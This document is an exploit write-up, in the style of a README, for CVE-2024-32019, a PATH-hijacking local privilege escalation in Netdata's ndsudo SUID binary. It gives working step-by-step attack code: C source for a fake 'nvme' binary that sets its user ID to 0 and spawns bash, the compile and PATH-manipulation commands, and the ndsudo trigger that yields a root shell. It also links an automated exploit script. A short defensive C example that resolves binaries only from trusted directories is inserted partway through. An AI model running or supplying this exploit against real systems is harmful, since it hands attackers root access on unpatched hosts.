CVE-2024-32019 - Netdata ndsudo PATH Vulnerability Exploit (LPE to Root)
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60, < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Summary
A Python-based exploit for CVE-2024-32019, a high-severity Local Privilege Escalation vulnerability in the Netdata Agent, leveraging a misconfigured SUID binary (ndsudo) that fails to securely handle the PATH environment variable.
[!Caution] This code is for educational and authorized testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal.
🔍 Overview
CVE ID: CVE-2024-32019
CVSS Score: 8.8 (High)
Disclosed: April 12, 2024
Component: Netdata Agent
Affected Versions:
>= v1.45.0, < v1.45.3
>= v1.44.0-60, < v1.45.0-169
🧠 Technical Summary
Netdata’s ndsudo tool is a SUID root binary intended to securely execute a limited set of system commands (like nvme) on behalf of non-root users.
However, due to an implementation flaw, it honors the user-controlled PATH variable when resolving command binaries. If an attacker can manipulate the PATH to include a writeable directory containing a malicious binary, ndsudo will execute it with root privileges, resulting in a local privilege escalation.
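The flaw described above comes from resolving the command name through the caller's PATH. As an added example (not Netdata's code or its patch; the names resolve_trusted and TRUSTED_DIRS and the directory list are assumptions), a SUID wrapper can instead resolve the name against a fixed list of trusted directories and hand the resulting absolute path to execv():

```c
#define _POSIX_C_SOURCE 200809L          /* for setenv() in the demo main */
/* Added example; hypothetical names, not Netdata source code. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Assumption: directories that only root can write to on this system. */
static const char *const TRUSTED_DIRS[] = {
    "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL
};

/* Resolve a helper name to an absolute path without reading PATH.
 * Returns 0 and fills out, or -1 if the name is unsafe or not found. */
int resolve_trusted(const char *name, char *out, size_t outlen)
{
    struct stat st;
    /* Accept a bare file name only: non-empty, no path separators. */
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;

    for (size_t i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen)
            continue;                    /* candidate would be truncated */
        if (stat(out, &st) != 0 || !S_ISREG(st.st_mode))
            continue;                    /* missing or not a regular file */
        if (st.st_mode & (S_IWGRP | S_IWOTH))
            continue;                    /* replaceable by non-owners */
        if (st.st_mode & (S_IXUSR | S_IXGRP | S_IXOTH))
            return 0;
    }
    if (outlen > 0)
        out[0] = '\0';
    return -1;
}

int main(int argc, char **argv)
{
    char path[4096];
    const char *name = argc > 1 ? argv[1] : "sh";
    setenv("PATH", "/tmp/fakebin", 1);   /* constructed hostile PATH */
    if (resolve_trusted(name, path, sizeof path) != 0) {
        fprintf(stderr, "%s: not in a trusted directory\n", name);
        return 1;
    }
    printf("%s\n", path);  /* a wrapper would execv() this, never execvp() */
    return 0;
}
```

Because the lookup never consults the environment, prepending a user-writable directory to PATH has no effect on which binary is chosen.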
💥 Manual Exploitation Steps
The following steps demonstrate how to manually exploit the vulnerability in ndsudo.
1. Create a Privilege Escalation Binary
Save the following C code as nvme.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
2. Compile the Exploit
gcc nvme.c -o nvme
3. Prepare the Exploit Environment on the Target
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modify the PATH
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
5. Trigger the Exploit
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
If successful, you’ll get a root shell.
# whoami
root
Automatic Exploitation
GitHub repo link: https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation
If you have SSH access, you can use CVE-2024-32019-dbs.py to automate this.